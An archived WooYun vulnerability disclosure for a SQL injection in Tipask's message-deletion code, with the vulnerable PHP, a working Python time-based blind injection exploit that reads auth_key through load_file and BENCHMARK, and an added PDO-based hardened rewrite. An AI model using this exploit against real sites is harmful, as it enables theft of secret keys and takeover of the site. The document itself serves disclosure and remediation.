WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
2014-12-15: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2015-03-15: The vendor has chosen to ignore the vulnerability; details disclosed to the public.
The review was really quick, approved as soon as I submitted it. Awesome!!!!
Some cases:
Analysis shows that the following file contains an injection: /control/message.php. The code is as follows:
function onremovedialog() {
    if($this->post['message_author']){
        $authors = $this->post['message_author'];
        $_ENV['message']->remove_by_author($authors);
        $this->message("对话删除成功!", get_url_source());
    }
}
Following the remove_by_author function:
function remove_by_author($authors) {
    // each $fromuid comes straight from the POST array message_author[] and is
    // interpolated into the SQL without escaping or casting
    foreach ($authors as $fromuid) {
        $this->db->query("DELETE FROM " . DB_TABLEPRE . "message WHERE fromuid<>touid AND ((fromuid=$fromuid AND touid=" . $this->base->user['uid'] . ") AND status=1)");
        $this->db->query("DELETE FROM " . DB_TABLEPRE . "message WHERE fromuid<>touid AND ((fromuid=" . $this->base->user['uid'] . " AND touid=" . $fromuid . ") AND status=2");
        $this->db->query("UPDATE " . DB_TABLEPRE . "message SET status=2 WHERE fromuid<>touid AND ((fromuid=$fromuid AND touid=" . $this->base->user['uid'] . ") AND status IN (0,1))");
        $this->db->query("UPDATE " . DB_TABLEPRE . "message SET status=1 WHERE fromuid<>touid AND ((fromuid=" . $this->base->user['uid'] . " AND touid=" . $fromuid . ") AND status IN (0,2))");
    }
}
As can be seen, there are several injection points here. To get a shell without restrictions, the goal is again to read the encrypted auth_key. Exp: take the one from the previous vulnerability and adapt it slightly:
import urllib
import urllib2
from time import *

def inject(url,payload):
    post = urllib.urlencode({ 'message_author[]':payload })
    header = {'Cookie':'tp_auth=70349FVn7tDasEWTHDyi6y7itpKIFhjiQ66UaK7mwIB31Rc7E0MttS8v7QfbBy1yGmiHDNptr3sjTC7RyXhM'}
    req = urllib2.Request(url,post,header)
    start_time = time()
    resp = urllib2.urlopen(req)
    flag = int(time()-start_time)
    return flag

def exploit():
    result = ""
    url = 'http://127.0.0.1/tipask/?message/removedialog.html'
    for i in range(4677,4741):
        for num in range(32,127):
            flag= inject(url,"6 AND touid=2)) and if(ord(substring((select/**/load_file(0x443A5C417070536572765C7777775C74697061736B5C646174615C63616368655C73657474696E672E706870)),%s,1))=%s,BENCHMARK(5000000,md5(1)),null)#"%(i,num))
            if flag>0:
                mstr = i - 4676
                result = result+chr(num)
                print 'auth_key =>'+result
                break

if __name__=="__main__":
    exploit()
Run it; the result is as shown in the figure:
Fix suggestion: filter the input.
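A hardened form of remove_by_author as an added example (not Tipask's own code): every value from message_author[] is reduced to a positive integer before it reaches SQL, and the four statements take the uids as bound parameters. It assumes a PDO connection is available as $pdo and that DB_TABLEPRE and the current user's uid exist as in the original; Tipask's real DB wrapper API is not shown on the page.

```php
<?php
// Added example, not Tipask's code. Assumes $pdo is a PDO handle and that
// DB_TABLEPRE is defined as in the original (stub for stand-alone runs).
if (!defined('DB_TABLEPRE')) { define('DB_TABLEPRE', 'tipask_'); }

// Keep only values that are positive integers; drop everything else, so a
// payload such as "6 AND touid=2)) and if(...)" never reaches the query.
function sanitize_author_ids($authors) {
    if (!is_array($authors)) {
        return array();
    }
    $clean = array();
    foreach ($authors as $a) {
        if (is_int($a) || (is_string($a) && ctype_digit($a))) {
            $v = (int)$a;
            if ($v > 0) {
                $clean[] = $v;
            }
        }
    }
    return array_values(array_unique($clean));
}

// Same four statements as the original, with the uids bound instead of
// interpolated. $me is the current user's uid ($this->base->user['uid']).
function remove_by_author_safe(PDO $pdo, $authors, $me) {
    $t = DB_TABLEPRE . 'message';
    $stmts = array(
        $pdo->prepare("DELETE FROM $t WHERE fromuid<>touid AND fromuid=:other AND touid=:me AND status=1"),
        $pdo->prepare("DELETE FROM $t WHERE fromuid<>touid AND fromuid=:me AND touid=:other AND status=2"),
        $pdo->prepare("UPDATE $t SET status=2 WHERE fromuid<>touid AND fromuid=:other AND touid=:me AND status IN (0,1)"),
        $pdo->prepare("UPDATE $t SET status=1 WHERE fromuid<>touid AND fromuid=:me AND touid=:other AND status IN (0,2)"),
    );
    $me = (int)$me;
    foreach (sanitize_author_ids($authors) as $fromuid) {
        foreach ($stmts as $st) {
            $st->execute(array(':other' => $fromuid, ':me' => $me));
        }
    }
}

// Constructed sample input: only "17" survives, the injected string is dropped.
var_dump(sanitize_author_ids(array('17', '6 AND touid=2)) and if(1,1,1)#', '')));
```

With emulated prepares disabled on the PDO handle the uids are sent as typed parameters, so even an integer-only filter bug in the future would not turn the query back into string concatenation.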
Vendor response: unable to contact the vendor, or the vendor actively declined.